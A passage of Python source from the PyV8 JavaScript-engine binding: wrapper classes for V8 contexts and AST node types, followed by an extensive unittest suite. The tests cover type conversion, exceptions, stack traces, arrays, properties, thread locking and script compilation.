JSStackTrace.Options = _PyV8.JSStackTraceOptions
JSStackFrame = _PyV8.JSStackFrame
class JSIsolate(_PyV8.JSIsolate):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
del self
class JSContext(_PyV8.JSContext):
def __init__(self, obj=None, extensions=None, ctxt=None):
if JSLocker.active:
self.lock = JSLocker()
self.lock.enter()
if ctxt:
_PyV8.JSContext.__init__(self, ctxt)
else:
_PyV8.JSContext.__init__(self, obj, extensions or [])
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if hasattr(JSLocker, 'lock'):
self.lock.leave()
self.lock = None
del self
# contribute by marc boeker <http://code.google.com/u/marc.boeker/>
def convert(obj):
if type(obj) == _PyV8.JSArray:
return [convert(v) for v in obj]
if type(obj) == _PyV8.JSObject:
return dict([[str(k), convert(obj.__getattr__(str(k)))] for k in (obj.__dir__() if is_py3k else obj.__members__)])
return obj
class AST:
Scope = _PyV8.AstScope
VarMode = _PyV8.AstVariableMode
Var = _PyV8.AstVariable
Label = _PyV8.AstLabel
NodeType = _PyV8.AstNodeType
Node = _PyV8.AstNode
Statement = _PyV8.AstStatement
Expression = _PyV8.AstExpression
Breakable = _PyV8.AstBreakableStatement
Block = _PyV8.AstBlock
Declaration = _PyV8.AstDeclaration
VariableDeclaration = _PyV8.AstVariableDeclaration
Module = _PyV8.AstModule
ModuleDeclaration = _PyV8.AstModuleDeclaration
ModuleLiteral = _PyV8.AstModuleLiteral
ModuleVariable = _PyV8.AstModuleVariable
ModulePath = _PyV8.AstModulePath
Iteration = _PyV8.AstIterationStatement
DoWhile = _PyV8.AstDoWhileStatement
While = _PyV8.AstWhileStatement
For = _PyV8.AstForStatement
ForIn = _PyV8.AstForInStatement
ExpressionStatement = _PyV8.AstExpressionStatement
Continue = _PyV8.AstContinueStatement
Break = _PyV8.AstBreakStatement
Return = _PyV8.AstReturnStatement
With = _PyV8.AstWithStatement
Case = _PyV8.AstCaseClause
Switch = _PyV8.AstSwitchStatement
Try = _PyV8.AstTryStatement
TryCatch = _PyV8.AstTryCatchStatement
TryFinally = _PyV8.AstTryFinallyStatement
Debugger = _PyV8.AstDebuggerStatement
Empty = _PyV8.AstEmptyStatement
Literal = _PyV8.AstLiteral
MaterializedLiteral = _PyV8.AstMaterializedLiteral
PropertyKind = _PyV8.AstPropertyKind
ObjectProperty = _PyV8.AstObjectProperty
Object = _PyV8.AstObjectLiteral
RegExp = _PyV8.AstRegExpLiteral
Array = _PyV8.AstArrayLiteral
VarProxy = _PyV8.AstVariableProxy
Property = _PyV8.AstProperty
Call = _PyV8.AstCall
CallNew = _PyV8.AstCallNew
CallRuntime = _PyV8.AstCallRuntime
Op = _PyV8.AstOperation
UnaryOp = _PyV8.AstUnaryOperation
BinOp = _PyV8.AstBinaryOperation
CountOp = _PyV8.AstCountOperation
CompOp = _PyV8.AstCompareOperation
Conditional = _PyV8.AstConditional
Assignment = _PyV8.AstAssignment
Throw = _PyV8.AstThrow
Function = _PyV8.AstFunctionLiteral
SharedFunction = _PyV8.AstSharedFunctionInfoLiteral
This = _PyV8.AstThisFunction
from datetime import *
import unittest
import traceback
if is_py3k:
def toNativeString(s):
return s
def toUnicodeString(s):
return s
else:
def toNativeString(s, encoding='utf-8'):
return s.encode(encoding) if isinstance(s, str) else s
def toUnicodeString(s, encoding='utf-8'):
return s if isinstance(s, str) else str(s, encoding)
class TestContext(unittest.TestCase):
def testMultiNamespace(self):
self.assertTrue(not bool(JSContext.inContext))
self.assertTrue(not bool(JSContext.entered))
class Global(object):
name = "global"
g = Global()
with JSContext(g) as ctxt:
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
class Local(object):
name = "local"
l = Local()
with JSContext(l):
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(l.name, str(JSContext.entered.locals.name))
self.assertEqual(l.name, str(JSContext.current.locals.name))
self.assertTrue(bool(JSContext.inContext))
self.assertEqual(g.name, str(JSContext.entered.locals.name))
self.assertEqual(g.name, str(JSContext.current.locals.name))
self.assertTrue(not bool(JSContext.entered))
self.assertTrue(not bool(JSContext.inContext))
def _testMultiContext(self):
# Create an environment
with JSContext() as ctxt0:
ctxt0.securityToken = "password"
global0 = ctxt0.locals
global0.custom = 1234
self.assertEqual(1234, int(global0.custom))
# Create an independent environment
with JSContext() as ctxt1:
ctxt1.securityToken = ctxt0.securityToken
global1 = ctxt1.locals
global1.custom = 1234
with ctxt0:
self.assertEqual(1234, int(global0.custom))
self.assertEqual(1234, int(global1.custom))
# Now create a new context with the old global
with JSContext(global1) as ctxt2:
ctxt2.securityToken = ctxt1.securityToken
with ctxt1:
self.assertEqual(1234, int(global1.custom))
def _testSecurityChecks(self):
with JSContext() as env1:
env1.securityToken = "foo"
# Create a function in env1.
env1.eval("spy=function(){return spy;}")
spy = env1.locals.spy
self.assertTrue(isinstance(spy, _PyV8.JSFunction))
# Create another function accessing global objects.
env1.eval("spy2=function(){return 123;}")
spy2 = env1.locals.spy2
self.assertTrue(isinstance(spy2, _PyV8.JSFunction))
# Switch to env2 in the same domain and invoke spy on env2.
env2 = JSContext()
env2.securityToken = "foo"
with env2:
result = spy.apply(env2.locals)
self.assertTrue(isinstance(result, _PyV8.JSFunction))
env2.securityToken = "bar"
# Call cross_domain_call, it should throw an exception
with env2:
self.assertRaises(JSError, spy2.apply, env2.locals)
def _testCrossDomainDelete(self):
with JSContext() as env1:
env2 = JSContext()
# Set to the same domain.
env1.securityToken = "foo"
env2.securityToken = "foo"
env1.locals.prop = 3
env2.locals.env1 = env1.locals
# Change env2 to a different domain and delete env1.prop.
#env2.securityToken = "bar"
self.assertEqual(3, int(env1.eval("prop")))
with env2:
self.assertEqual(3, int(env2.eval("this.env1.prop")))
self.assertEqual("false", str(env2.eval("delete env1.prop")))
# Check that env1.prop still exists.
self.assertEqual(3, int(env1.locals.prop))
class TestWrapper(unittest.TestCase):
def testObject(self):
with JSContext() as ctxt:
o = ctxt.eval("new Object()")
self.assertTrue(hash(o) > 0)
o1 = o.clone()
self.assertEqual(hash(o1), hash(o))
self.assertTrue(o != o1)
self.assertRaises(UnboundLocalError, o.clone)
def testAutoConverter(self):
with JSContext() as ctxt:
ctxt.eval("""
var_i = 1;
var_f = 1.0;
var_s = "test";
var_b = true;
var_s_obj = new String("test");
var_b_obj = new Boolean(true);
var_f_obj = new Number(1.5);
""")
vars = ctxt.locals
var_i = vars.var_i
self.assertTrue(var_i)
self.assertEqual(1, int(var_i))
var_f = vars.var_f
self.assertTrue(var_f)
self.assertEqual(1.0, float(vars.var_f))
var_s = vars.var_s
self.assertTrue(var_s)
self.assertEqual("test", str(vars.var_s))
var_b = vars.var_b
self.assertTrue(var_b)
self.assertTrue(bool(var_b))
self.assertEqual("test", vars.var_s_obj)
self.assertTrue(vars.var_b_obj)
self.assertEqual(1.5, vars.var_f_obj)
attrs = dir(ctxt.locals)
self.assertTrue(attrs)
self.assertTrue("var_i" in attrs)
self.assertTrue("var_f" in attrs)
self.assertTrue("var_s" in attrs)
self.assertTrue("var_b" in attrs)
self.assertTrue("var_s_obj" in attrs)
self.assertTrue("var_b_obj" in attrs)
self.assertTrue("var_f_obj" in attrs)
def testExactConverter(self):
class MyInteger(int, JSClass):
pass
class MyString(str, JSClass):
pass
class MyUnicode(str, JSClass):
pass
class MyDateTime(time, JSClass):
pass
class Global(JSClass):
var_bool = True
var_int = 1
var_float = 1.0
var_str = 'str'
var_unicode = 'unicode'
var_datetime = datetime.now()
var_date = date.today()
var_time = time()
var_myint = MyInteger()
var_mystr = MyString('mystr')
var_myunicode = MyUnicode('myunicode')
var_mytime = MyDateTime()
with JSContext(Global()) as ctxt:
typename = ctxt.eval("(function (name) { return this[name].constructor.name; })")
typeof = ctxt.eval("(function (name) { return typeof(this[name]); })")
self.assertEqual('Boolean', typename('var_bool'))
self.assertEqual('Number', typename('var_int'))
self.assertEqual('Number', typename('var_float'))
self.assertEqual('String', typename('var_str'))
self.assertEqual('String', typename('var_unicode'))
self.assertEqual('Date', typename('var_datetime'))
self.assertEqual('Date', typename('var_date'))
self.assertEqual('Date', typename('var_time'))
self.assertEqual('MyInteger', typename('var_myint'))
self.assertEqual('MyString', typename('var_mystr'))
self.assertEqual('MyUnicode', typename('var_myunicode'))
self.assertEqual('MyDateTime', typename('var_mytime'))
self.assertEqual('object', typeof('var_myint'))
self.assertEqual('object', typeof('var_mystr'))
self.assertEqual('object', typeof('var_myunicode'))
self.assertEqual('object', typeof('var_mytime'))
def testJavascriptWrapper(self):
with JSContext() as ctxt:
self.assertEqual(type(None), type(ctxt.eval("null")))
self.assertEqual(type(None), type(ctxt.eval("undefined")))
self.assertEqual(bool, type(ctxt.eval("true")))
self.assertEqual(str, type(ctxt.eval("'test'")))
self.assertEqual(int, type(ctxt.eval("123")))
self.assertEqual(float, type(ctxt.eval("3.14")))
self.assertEqual(datetime, type(ctxt.eval("new Date()")))
self.assertEqual(JSArray, type(ctxt.eval("[1, 2, 3]")))
self.assertEqual(JSFunction, type(ctxt.eval("(function() {})")))
self.assertEqual(JSObject, type(ctxt.eval("new Object()")))
def testPythonWrapper(self):
with JSContext() as ctxt:
typeof = ctxt.eval("(function type(value) { return typeof value; })")
protoof = ctxt.eval("(function protoof(value) { return Object.prototype.toString.apply(value); })")
self.assertEqual('[object Null]', protoof(None))
self.assertEqual('boolean', typeof(True))
self.assertEqual('number', typeof(123))
self.assertEqual('number', typeof(3.14))
self.assertEqual('string', typeof('test'))
self.assertEqual('string', typeof('test'))
self.assertEqual('[object Date]', protoof(datetime.now()))
self.assertEqual('[object Date]', protoof(date.today()))
self.assertEqual('[object Date]', protoof(time()))
def test():
pass
self.assertEqual('[object Function]', protoof(abs))
self.assertEqual('[object Function]', protoof(test))
self.assertEqual('[object Function]', protoof(self.testPythonWrapper))
self.assertEqual('[object Function]', protoof(int))
def testFunction(self):
with JSContext() as ctxt:
func = ctxt.eval("""
(function ()
{
function a()
{
return "abc";
}
return a();
})
""")
self.assertEqual("abc", str(func()))
self.assertTrue(func != None)
self.assertFalse(func == None)
func = ctxt.eval("(function test() {})")
self.assertEqual("test", func.name)
self.assertEqual("", func.resname)
self.assertEqual(0, func.linenum)
self.assertEqual(14, func.colnum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
#TODO fix me, why the setter doesn't work?
# func.name = "hello"
# it seems __setattr__ was called instead of CJavascriptFunction::SetName
func.setName("hello")
self.assertEqual("hello", func.name)
def testCall(self):
class Hello(object):
def __call__(self, name):
return "hello " + name
class Global(JSClass):
hello = Hello()
with JSContext(Global()) as ctxt:
self.assertEqual("hello flier", ctxt.eval("hello('flier')"))
def testJSFunction(self):
with JSContext() as ctxt:
hello = ctxt.eval("(function (name) { return 'hello ' + name; })")
self.assertTrue(isinstance(hello, _PyV8.JSFunction))
self.assertEqual("hello flier", hello('flier'))
self.assertEqual("hello flier", hello.invoke(['flier']))
obj = ctxt.eval("({ 'name': 'flier', 'hello': function (name) { return 'hello ' + name + ' from ' + this.name; }})")
hello = obj.hello
self.assertTrue(isinstance(hello, JSFunction))
self.assertEqual("hello flier from flier", hello('flier'))
tester = ctxt.eval("({ 'name': 'tester' })")
self.assertEqual("hello flier from tester", hello.invoke(tester, ['flier']))
self.assertEqual("hello flier from json", hello.apply({ 'name': 'json' }, ['flier']))
def testConstructor(self):
with JSContext() as ctx:
ctx.eval("""
var Test = function() {
this.trySomething();
};
Test.prototype.trySomething = function() {
this.name = 'flier';
};
var Test2 = function(first_name, last_name) {
this.name = first_name + ' ' + last_name;
};
""")
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSFunction))
test = JSObject.create(ctx.locals.Test)
self.assertTrue(isinstance(ctx.locals.Test, _PyV8.JSObject))
self.assertEqual("flier", test.name);
test2 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'))
self.assertEqual("Flier Lu", test2.name);
test3 = JSObject.create(ctx.locals.Test2, ('Flier', 'Lu'), { 'email': 'flier.lu@gmail.com' })
self.assertEqual("flier.lu@gmail.com", test3.email);
def testJSError(self):
with JSContext() as ctxt:
try:
ctxt.eval('throw "test"')
self.fail()
except:
self.assertTrue(JSError, sys.exc_info()[0])
def testErrorInfo(self):
with JSContext() as ctxt:
with JSEngine() as engine:
try:
engine.compile("""
function hello()
{
throw Error("hello world");
}
hello();""", "test", 10, 10).run()
self.fail()
except JSError as e:
self.assertTrue(str(e).startswith('JSError: Error: hello world ( test @ 14 : 34 ) ->'))
self.assertEqual("Error", e.name)
self.assertEqual("hello world", e.message)
self.assertEqual("test", e.scriptName)
self.assertEqual(14, e.lineNum)
self.assertEqual(102, e.startPos)
self.assertEqual(103, e.endPos)
self.assertEqual(34, e.startCol)
self.assertEqual(35, e.endCol)
self.assertEqual('throw Error("hello world");', e.sourceLine.strip())
self.assertEqual('Error: hello world\n' +
' at Error (<anonymous>)\n' +
' at hello (test:14:35)\n' +
' at test:17:25', e.stackTrace)
def testParseStack(self):
self.assertEqual([
('Error', 'unknown source', None, None),
('test', 'native', None, None),
('<anonymous>', 'test0', 3, 5),
('f', 'test1', 2, 19),
('g', 'test2', 1, 15),
(None, 'test3', 1, None),
(None, 'test3', 1, 1),
], JSError.parse_stack("""Error: err
at Error (unknown source)
at test (native)
at new <anonymous> (test0:3:5)
at f (test1:2:19)
at g (test2:1:15)
at test3:1
at test3:1:1"""))
def testStackTrace(self):
class Global(JSClass):
def GetCurrentStackTrace(self, limit):
return JSStackTrace.GetCurrentStackTrace(4, JSStackTrace.Options.Detailed)
with JSContext(Global()) as ctxt:
st = ctxt.eval("""
function a()
{
return GetCurrentStackTrace(10);
}
function b()
{
return eval("a()");
}
function c()
{
return new b();
}
c();""", "test")
self.assertEqual(4, len(st))
self.assertEqual("\tat a (test:4:28)\n\tat (eval)\n\tat b (test:8:28)\n\tat c (test:12:28)\n", str(st))
self.assertEqual("test.a (4:28)\n. (1:1) eval\ntest.b (8:28) constructor\ntest.c (12:28)",
"\n".join(["%s.%s (%d:%d)%s%s" % (
f.scriptName, f.funcName, f.lineNum, f.column,
' eval' if f.isEval else '',
' constructor' if f.isConstructor else '') for f in st]))
def testPythonException(self):
class Global(JSClass):
def raiseException(self):
raise RuntimeError("Hello")
with JSContext(Global()) as ctxt:
r = ctxt.eval("""
msg ="";
try
{
this.raiseException()
}
catch(e)
{
msg += "catch " + e + ";";
}
finally
{
msg += "finally";
}""")
self.assertEqual("catch Error: Hello;finally", str(ctxt.locals.msg))
def testExceptionMapping(self):
class TestException(Exception):
pass
class Global(JSClass):
def raiseIndexError(self):
return [1, 2, 3][5]
def raiseAttributeError(self):
None.hello()
def raiseSyntaxError(self):
eval("???")
def raiseTypeError(self):
int(sys)
def raiseNotImplementedError(self):
raise NotImplementedError("Not support")
def raiseExceptions(self):
raise TestException()
with JSContext(Global()) as ctxt:
ctxt.eval("try { this.raiseIndexError(); } catch (e) { msg = e; }")
self.assertEqual("RangeError: list index out of range", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseAttributeError(); } catch (e) { msg = e; }")
self.assertEqual("ReferenceError: 'NoneType' object has no attribute 'hello'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseSyntaxError(); } catch (e) { msg = e; }")
self.assertEqual("SyntaxError: invalid syntax", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseTypeError(); } catch (e) { msg = e; }")
self.assertEqual("TypeError: int() argument must be a string or a number, not 'module'", str(ctxt.locals.msg))
ctxt.eval("try { this.raiseNotImplementedError(); } catch (e) { msg = e; }")
self.assertEqual("Error: Not support", str(ctxt.locals.msg))
self.assertRaises(TestException, ctxt.eval, "this.raiseExceptions();")
def testArray(self):
with JSContext() as ctxt:
array = ctxt.eval("""
var array = new Array();
for (i=0; i<10; i++)
{
array[i] = 10-i;
}
array;
""")
self.assertTrue(isinstance(array, _PyV8.JSArray))
self.assertEqual(10, len(array))
self.assertTrue(5 in array)
self.assertFalse(15 in array)
self.assertEqual(10, len(array))
for i in range(10):
self.assertEqual(10-i, array[i])
array[5] = 0
self.assertEqual(0, array[5])
del array[5]
self.assertEqual(None, array[5])
# array [10, 9, 8, 7, 6, None, 4, 3, 2, 1]
# array[4:7] 4^^^^^^^^^7
# array[-3:-1] -3^^^^^^-1
# array[0:0] []
self.assertEqual([6, None, 4], array[4:7])
self.assertEqual([3, 2], array[-3:-1])
self.assertEqual([], array[0:0])
array[1:3] = [9, 9, 9]
self.assertEqual([10, 9, 9, 9, 7, 6, None, 4, 3, 2, 1], list(array))
array[5:8] = [8, 8]
self.assertEqual([10, 9, 9, 9, 7, 8, 8, 3, 2, 1], list(array))
del array[1:4]
self.assertEqual([10, 7, 8, 8, 3, 2, 1], list(array))
ctxt.locals.array1 = JSArray(5)
ctxt.locals.array2 = JSArray([1, 2, 3, 4, 5])
for i in range(len(ctxt.locals.array2)):
ctxt.locals.array1[i] = ctxt.locals.array2[i] * 10
ctxt.eval("""
var sum = 0;
for (i=0; i<array1.length; i++)
sum += array1[i]
for (i=0; i<array2.length; i++)
sum += array2[i]
""")
self.assertEqual(165, ctxt.locals.sum)
ctxt.locals.array3 = [1, 2, 3, 4, 5]
self.assertTrue(ctxt.eval('array3[1] === 2'))
self.assertTrue(ctxt.eval('array3[9] === undefined'))
args = [
["a = Array(7); for(i=0; i<a.length; i++) a[i] = i; a[3] = undefined; a[a.length-1]; a", "0,1,2,,4,5,6", [0, 1, 2, None, 4, 5, 6]],
["a = Array(7); for(i=0; i<a.length - 1; i++) a[i] = i; a[a.length-1]; a", "0,1,2,3,4,5,", [0, 1, 2, 3, 4, 5, None]],
["a = Array(7); for(i=1; i<a.length; i++) a[i] = i; a[a.length-1]; a", ",1,2,3,4,5,6", [None, 1, 2, 3, 4, 5, 6]]
]
for arg in args:
array = ctxt.eval(arg[0])
self.assertEqual(arg[1], str(array))
self.assertEqual(arg[2], [array[i] for i in range(len(array))])
self.assertEqual(3, ctxt.eval("(function (arr) { return arr.length; })")(JSArray([1, 2, 3])))
self.assertEqual(2, ctxt.eval("(function (arr, idx) { return arr[idx]; })")(JSArray([1, 2, 3]), 1))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray([1, 2, 3])))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray((1, 2, 3))))
self.assertEqual('[object Array]', ctxt.eval("(function (arr) { return Object.prototype.toString.call(arr); })")(JSArray(list(range(3)))))
[x for x in JSArray([1,2,3])]
def testMultiDimArray(self):
with JSContext() as ctxt:
ret = ctxt.eval("""
({
'test': function(){
return [
[ 1, 'abla' ],
[ 2, 'ajkss' ],
]
}
})
""").test()
self.assertEqual([[1, 'abla'], [2, 'ajkss']], convert(ret))
def testLazyConstructor(self):
class Globals(JSClass):
def __init__(self):
self.array=JSArray([1,2,3])
with JSContext(Globals()) as ctxt:
self.assertEqual(2, ctxt.eval("""array[1]"""))
def testForEach(self):
class NamedClass(object):
foo = 1
def __init__(self):
self.bar = 2
@property
def foobar(self):
return self.foo + self.bar
def gen(x):
for i in range(x):
yield i
with JSContext() as ctxt:
func = ctxt.eval("""(function (k) {
var result = [];
for (var prop in k) {
result.push(prop);
}
return result;
})""")
self.assertTrue(set(["bar", "foo", "foobar"]).issubset(set(func(NamedClass()))))
self.assertEqual(["0", "1", "2"], list(func([1, 2, 3])))
self.assertEqual(["0", "1", "2"], list(func((1, 2, 3))))
self.assertEqual(["1", "2", "3"], list(func({1:1, 2:2, 3:3})))
self.assertEqual(["0", "1", "2"], list(func(gen(3))))
def testDict(self):
with JSContext() as ctxt:
obj = ctxt.eval("var r = { 'a' : 1, 'b' : 2 }; r")
self.assertEqual(1, obj.a)
self.assertEqual(2, obj.b)
self.assertEqual({ 'a' : 1, 'b' : 2 }, dict(obj))
self.assertEqual({ 'a': 1,
'b': [1, 2, 3],
'c': { 'str' : 'goofy',
'float' : 1.234,
'obj' : { 'name': 'john doe' }},
'd': True,
'e': None },
convert(ctxt.eval("""var x =
{ a: 1,
b: [1, 2, 3],
c: { str: 'goofy',
float: 1.234,
obj: { name: 'john doe' }},
d: true,
e: null }; x""")))
def testDate(self):
with JSContext() as ctxt:
now1 = ctxt.eval("new Date();")
self.assertTrue(now1)
now2 = datetime.utcnow()
delta = now2 - now1 if now2 > now1 else now1 - now2
self.assertTrue(delta < timedelta(seconds=1))
func = ctxt.eval("(function (d) { return d.toString(); })")
now = datetime.now()
self.assertTrue(str(func(now)).startswith(now.strftime("%a %b %d %Y %H:%M:%S")))
def testUnicode(self):
with JSContext() as ctxt:
self.assertEqual("人", toUnicodeString(ctxt.eval("\"人\"")))
self.assertEqual("é", toUnicodeString(ctxt.eval("\"é\"")))
func = ctxt.eval("(function (msg) { return msg.length; })")
self.assertEqual(2, func("测试"))
def testClassicStyleObject(self):
class FileSystemWarpper:
@property
def cwd(self):
return os.getcwd()
class Global:
@property
def fs(self):
return FileSystemWarpper()
with JSContext(Global()) as ctxt:
self.assertEqual(os.getcwd(), ctxt.eval("fs.cwd"))
def testRefCount(self):
count = sys.getrefcount(None)
class Global(JSClass):
pass
with JSContext(Global()) as ctxt:
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
ctxt.eval("""
var none = null;
""")
self.assertEqual(count+1, sys.getrefcount(None))
def testProperty(self):
class Global(JSClass):
def __init__(self, name):
self._name = name
def getname(self):
return self._name
def setname(self, name):
self._name = name
def delname(self):
self._name = 'deleted'
name = property(getname, setname, delname)
g = Global('world')
with JSContext(g) as ctxt:
self.assertEqual('world', ctxt.eval("name"))
self.assertEqual('flier', ctxt.eval("this.name = 'flier';"))
self.assertEqual('flier', ctxt.eval("name"))
self.assertTrue(ctxt.eval("delete name"))
###
# FIXME replace the global object with Python object
#
#self.assertEqual('deleted', ctxt.eval("name"))
#ctxt.eval("__defineGetter__('name', function() { return 'fixed'; });")
#self.assertEqual('fixed', ctxt.eval("name"))
def testGetterAndSetter(self):
class Global(JSClass):
def __init__(self, testval):
self.testval = testval
with JSContext(Global("Test Value A")) as ctxt:
self.assertEqual("Test Value A", ctxt.locals.testval)
ctxt.eval("""
this.__defineGetter__("test", function() {
return this.testval;
});
this.__defineSetter__("test", function(val) {
this.testval = val;
});
""")
self.assertEqual("Test Value A", ctxt.locals.test)
ctxt.eval("test = 'Test Value B';")
self.assertEqual("Test Value B", ctxt.locals.test)
def testDestructor(self):
import gc
owner = self
owner.deleted = False
class Hello(object):
def say(self):
pass
def __del__(self):
owner.deleted = True
def test():
with JSContext() as ctxt:
fn = ctxt.eval("(function (obj) { obj.say(); })")
obj = Hello()
self.assertEqual(2, sys.getrefcount(obj))
fn(obj)
self.assertEqual(4, sys.getrefcount(obj))
del obj
test()
self.assertFalse(owner.deleted)
JSEngine.collect()
gc.collect()
self.assertTrue(owner.deleted)
def testNullInString(self):
with JSContext() as ctxt:
fn = ctxt.eval("(function (s) { return s; })")
self.assertEqual("hello \0 world", fn("hello \0 world"))
def testLivingObjectCache(self):
class Global(JSClass):
i = 1
b = True
o = object()
with JSContext(Global()) as ctxt:
self.assertTrue(ctxt.eval("i == i"))
self.assertTrue(ctxt.eval("b == b"))
self.assertTrue(ctxt.eval("o == o"))
def testNamedSetter(self):
class Obj(JSClass):
@property
def p(self):
return self._p
@p.setter
def p(self, value):
self._p = value
class Global(JSClass):
def __init__(self):
self.obj = Obj()
self.d = {}
self.p = None
with JSContext(Global()) as ctxt:
ctxt.eval("""
x = obj;
x.y = 10;
x.p = 10;
d.y = 10;
""")
self.assertEqual(10, ctxt.eval("obj.y"))
self.assertEqual(10, ctxt.eval("obj.p"))
self.assertEqual(10, ctxt.locals.d['y'])
def testWatch(self):
class Obj(JSClass):
def __init__(self):
self.p = 1
class Global(JSClass):
def __init__(self):
self.o = Obj()
with JSContext(Global()) as ctxt:
ctxt.eval("""
o.watch("p", function (id, oldval, newval) {
return oldval + newval;
});
""")
self.assertEqual(1, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(3, ctxt.eval("o.p"))
ctxt.eval("delete o.p;")
self.assertEqual(None, ctxt.eval("o.p"))
ctxt.eval("o.p = 2;")
self.assertEqual(2, ctxt.eval("o.p"))
ctxt.eval("o.unwatch('p');")
ctxt.eval("o.p = 1;")
self.assertEqual(1, ctxt.eval("o.p"))
def testReferenceError(self):
class Global(JSClass):
def __init__(self):
self.s = self
with JSContext(Global()) as ctxt:
self.assertRaises(ReferenceError, ctxt.eval, 'x')
self.assertTrue(ctxt.eval("typeof(x) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(String) === 'function'"))
self.assertTrue(ctxt.eval("typeof(s.String) === 'undefined'"))
self.assertTrue(ctxt.eval("typeof(s.z) === 'undefined'"))
def testRaiseExceptionInGetter(self):
class Document(JSClass):
def __getattr__(self, name):
if name == 'y':
raise TypeError()
return JSClass.__getattr__(self, name)
class Global(JSClass):
def __init__(self):
self.document = Document()
with JSContext(Global()) as ctxt:
self.assertEqual(None, ctxt.eval('document.x'))
self.assertRaises(TypeError, ctxt.eval, 'document.y')
class TestMultithread(unittest.TestCase):
def testLocker(self):
self.assertFalse(JSLocker.active)
self.assertFalse(JSLocker.locked)
with JSLocker() as outter_locker:
self.assertTrue(JSLocker.active)
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
with JSLocker() as inner_locker:
self.assertTrue(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
with JSUnlocker() as unlocker:
self.assertFalse(JSLocker.locked)
self.assertTrue(outter_locker)
self.assertTrue(inner_locker)
self.assertTrue(JSLocker.locked)
self.assertTrue(JSLocker.active)
self.assertFalse(JSLocker.locked)
locker = JSLocker()
with JSContext():
self.assertRaises(RuntimeError, locker.__enter__)
self.assertRaises(RuntimeError, locker.__exit__, None, None, None)
del locker
def testMultiPythonThread(self):
import time, threading
class Global:
count = 0
started = threading.Event()
finished = threading.Semaphore(0)
def sleep(self, ms):
time.sleep(ms / 1000.0)
self.count += 1
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
started.wait();
for (i=0; i<10; i++)
{
sleep(100);
}
finished.release();
""")
threading.Thread(target=run).start()
now = time.time()
self.assertEqual(0, g.count)
g.started.set()
g.finished.acquire()
self.assertEqual(10, g.count)
self.assertTrue((time.time() - now) >= 1)
def testMultiJavascriptThread(self):
import time, threading
class Global:
result = []
def add(self, value):
with JSUnlocker():
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker():
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
def _testPreemptionJavascriptThreads(self):
import time, threading
class Global:
result = []
def add(self, value):
# we use preemption scheduler to switch between threads
# so, just comment the JSUnlocker
#
# with JSUnlocker() as unlocker:
time.sleep(0.1)
self.result.append(value)
g = Global()
def run():
with JSContext(g) as ctxt:
ctxt.eval("""
for (i=0; i<10; i++)
add(i);
""")
threads = [threading.Thread(target=run), threading.Thread(target=run)]
with JSLocker() as locker:
JSLocker.startPreemption(100)
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(20, len(g.result))
class TestEngine(unittest.TestCase):
def testClassProperties(self):
with JSContext() as ctxt:
self.assertTrue(str(JSEngine.version).startswith("3."))
self.assertFalse(JSEngine.dead)
def testCompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
s = engine.compile("1+2")
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.compile, "1+")
def testPrecompile(self):
with JSContext() as ctxt:
with JSEngine() as engine:
data = engine.precompile("1+2")
self.assertTrue(data)
self.assertEqual(28, len(data))
s = engine.compile("1+2", precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual("1+2", s.source)
self.assertEqual(3, int(s.run()))
self.assertRaises(SyntaxError, engine.precompile, "1+")
def testUnicodeSource(self):
class Global(JSClass):
var = '测试'
def __getattr__(self, name):
if (name if is_py3k else name.decode('utf-8')) == '变量':
return self.var
return JSClass.__getattr__(self, name)
g = Global()
with JSContext(g) as ctxt:
with JSEngine() as engine:
src = """
function 函数() { return 变量.length; }
函数();
var func = function () {};
"""
data = engine.precompile(src)
self.assertTrue(data)
self.assertEqual(68, len(data))
s = engine.compile(src, precompiled=data)
self.assertTrue(isinstance(s, _PyV8.JSScript))
self.assertEqual(toNativeString(src), s.source)
self.assertEqual(2, s.run())
func_name = toNativeString('函数')
self.assertTrue(hasattr(ctxt.locals, func_name))
func = getattr(ctxt.locals, func_name)
self.assertTrue(isinstance(func, _PyV8.JSFunction))
self.assertEqual(func_name, func.name)
self.assertEqual("", func.resname)
self.assertEqual(1, func.linenum)
self.assertEqual(0, func.lineoff)
self.assertEqual(0, func.coloff)
var_name = toNativeString('变量')
setattr(ctxt.locals, var_name, '测试长字符串')
self.assertEqual(6, func())
self.assertEqual("func", ctxt.locals.func.inferredname)
def testExtension(self):
extSrc = """function hello(name) { return "hello " + name + " from javascript"; }"""
extJs = JSExtension("hello/javascript", extSrc)
self.assertTrue(extJs)
self.assertEqual("hello/javascript", extJs.name)
self.assertEqual(extSrc, extJs.source)
self.assertFalse(extJs.autoEnable)
self.assertTrue(extJs.registered)
TestEngine.extJs = extJs
with JSContext(extensions=['hello/javascript']) as ctxt:
